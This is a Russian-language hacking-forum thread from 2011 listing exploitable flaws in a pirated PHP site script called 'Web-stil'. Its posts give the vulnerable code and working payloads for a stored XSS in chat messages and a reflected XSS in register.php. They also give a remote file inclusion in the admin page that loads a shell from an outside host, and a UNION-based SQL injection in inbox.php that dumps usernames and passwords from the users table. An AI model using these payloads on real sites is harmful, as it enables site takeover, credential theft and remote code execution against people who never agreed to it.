Старый 05.02.2011, 14:41   #1
Online
 
Аватар для Online
 
Регистрация: 31.01.2011
Сообщений: 10
Репутация: 10
По умолчанию Web-stil ("пиратская" копия)

Web-stil ("пиратская копия")
Version: 1.0 (нет данных)

Active XSS

Vuln file: chat.php(messlist.php)
Файл chat.php через <iframe> загружает результат messlist.php, а messlist.php в свое время берет сообщения из БД (в БД сообщение добавляется без фильтрации):
PHP код:
//chat.php
<iframe frameborder="0" width="100%" height="400" src="messlist.php" marginheight="2" marginwidth="2" scrolling="auto" allowtransparency="yes" name="chatmesslist" style="border:#000000 1px solid;"></iframe>

// 
PHP код:
//messlist.php
$res=mysql_query("select * from tb_chat order by id desc limit 20");
// 
Exploit:
Код:
Просто через форму добавляем сообщения с содержанием "<script>alert('XsS')</script>" и имеем активку..[/COLOR]

Passive XSS

Vuln file: register.php
PHP код:
//
<td width="250" align="left"><input type="text" size="25" maxlength="25" name="referer" value="<? echo limpiar($_GET["r"]); ?>" autocomplete="off" class="field" value="" tabindex="1" /></td>

//
Exploit:
Код:
http://[host]/[path]/register.php?r="><script>alert(111)</script>
Примеры
__________________
Чем больше ты имеешь, тем с большей жадностью стремишься к тому, чего у тебя нет. Война у тебя рождается из побед.
Online вне форума   Ответить с цитированием
Старый 05.02.2011, 18:46   #2
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

RFI or LFI
Need:
allow_url_include = on
admin account

admin/adminmain.php
PHP код:
if(isset($_GET["p"]))
{
    
$p=$_GET["p"];
    
$p.='.php';
    include(
$p);

Код:
http://localhost/web-stil/admin/adminmain.php?p=http://pentagon.xek/myshell_at_pentagon.txt?
Скачать двиг можно тутэ: http://vo-bank.com/engine/download.php?id=25
p.s. указывайте ссылки на скачивание,приходится гуглеть.
~d0s~ вне форума   Ответить с цитированием
Старый 08.02.2011, 14:14   #3
Online
 
Аватар для Online
 
Регистрация: 31.01.2011
Сообщений: 10
Репутация: 10
По умолчанию

SQL inj
if mq = off
Vuln file: inbox.php
PHP код:
///
    
if($action=='view')
    {
        require(
'config.php');
        
$res=mysql_query("select * from tb_mail where id='$id'");
        
$res=mysql_fetch_array($res);
        
mysql_query("update tb_mail set status='1' where id='$id'");
        
mysql_close($con);
        
?>

/// 
Exploit:
Код:
Отправляем POST'ом "action=view&id=-1' union select 1,2,3,concat_ws(0x3a,username,password),5,6,7 from tb_users limit 0,1+--+"
В админке и почти во всех скриптах инъекции присутствуют =)
__________________
Чем больше ты имеешь, тем с большей жадностью стремишься к тому, чего у тебя нет. Война у тебя рождается из побед.
Online вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot